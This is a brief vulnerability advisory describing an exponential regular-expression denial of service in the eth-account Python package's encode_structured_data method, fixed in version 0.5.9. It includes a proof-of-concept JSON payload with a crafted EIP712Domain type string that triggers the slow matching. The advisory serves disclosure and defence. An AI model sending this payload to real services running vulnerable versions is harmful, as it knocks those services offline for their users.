Exponential ReDoS in eth-account leads to denial of service
eth-account (,0.5.9), fixed in 0.5.9
An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the eth-account PyPI package, when an attacker is able to supply arbitrary input to the encode_structured_data method
{
"types": {
"EIP712Domain": [
{"name": "aaaa", "type": "$[11111111111111111111111110"},
{"name": "version", "type": "string"},
{"name": "chainId", "type": "uint256"},
{"name": "verifyingContract", "type": "address"}
]
}
}
No mitigations are supplied for this issue